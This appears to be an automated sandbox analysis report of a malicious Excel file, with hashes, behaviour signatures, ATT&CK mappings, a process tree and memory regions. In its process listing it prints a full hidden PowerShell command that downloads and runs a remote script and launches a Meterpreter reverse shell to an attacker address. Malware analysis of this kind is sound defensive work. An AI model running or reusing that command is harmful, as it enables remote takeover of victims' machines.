Analysis

  • max time kernel
    47s
  • max time network
    13s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-07-2024 21:36

General

  • Target

    d41a70e2ee05975672659527bdb66ea0f32cb50622dfd4a630252cabae4fa938.xls

  • Size

    44KB

  • MD5

    100bbd0c7b93a12142374ffce4aac777

  • SHA1

    16718e99e93da40c16dca0dce8e7d24dd013d3b1

  • SHA256

    d41a70e2ee05975672659527bdb66ea0f32cb50622dfd4a630252cabae4fa938

  • SHA512

    78947d51d7027865b26ff139a8d41c6e088fd942fbb4553d99786f23fe55a81f79d1bd16187767c1698012a8280d9beedd3b3b52de6c33267d453128fea86750

  • SSDEEP

    768:GtvojzJl8kkhzOjugt643rUdc1um4GKt+cL23dA7148u5xWouF6mQQcEnJ9ac0xy:xl8kkhzOjugt643rGc1um4GKt+cL23dC

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\d41a70e2ee05975672659527bdb66ea0f32cb50622dfd4a630252cabae4fa938.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2036
    • C:\Windows\SYSTEM32\wscript.exe
      wscript C:\Users\Public\config.vbs
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4156
      • C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
        "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4828
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2644

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize

    53KB

    MD5

    a26df49623eff12a70a93f649776dab7

    SHA1

    efb53bd0df3ac34bd119adf8788127ad57e53803

    SHA256

    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

    SHA512

    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eekyibqc.bhl.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Public\config.vbs
    Filesize

    461B

    MD5

    ce52ab154163c511f0efa6a61e22ab64

    SHA1

    9f12cc215e15802eddcb02cb5370ef16b21fa3a6

    SHA256

    df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17

    SHA512

    cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78

  • memory/2036-15-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-66-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-6-0x00007FF8AAE70000-0x00007FF8AAE80000-memory.dmp
    Filesize

    64KB

  • memory/2036-8-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-7-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-10-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-22-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-11-0x00007FF8A8C80000-0x00007FF8A8C90000-memory.dmp
    Filesize

    64KB

  • memory/2036-5-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-12-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-13-0x00007FF8A8C80000-0x00007FF8A8C90000-memory.dmp
    Filesize

    64KB

  • memory/2036-14-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-16-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-0-0x00007FF8AAE70000-0x00007FF8AAE80000-memory.dmp
    Filesize

    64KB

  • memory/2036-68-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-3-0x00007FF8AAE70000-0x00007FF8AAE80000-memory.dmp
    Filesize

    64KB

  • memory/2036-9-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-21-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-19-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-17-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-27-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-34-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-35-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-4-0x00007FF8EAE8D000-0x00007FF8EAE8E000-memory.dmp
    Filesize

    4KB

  • memory/2036-2-0x00007FF8AAE70000-0x00007FF8AAE80000-memory.dmp
    Filesize

    64KB

  • memory/2036-18-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-67-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-1-0x00007FF8AAE70000-0x00007FF8AAE80000-memory.dmp
    Filesize

    64KB

  • memory/2036-65-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2036-20-0x00007FF8EADF0000-0x00007FF8EAFE5000-memory.dmp
    Filesize

    2.0MB

  • memory/2644-56-0x000001D254E30000-0x000001D254E74000-memory.dmp
    Filesize

    272KB

  • memory/2644-42-0x000001D254940000-0x000001D254962000-memory.dmp
    Filesize

    136KB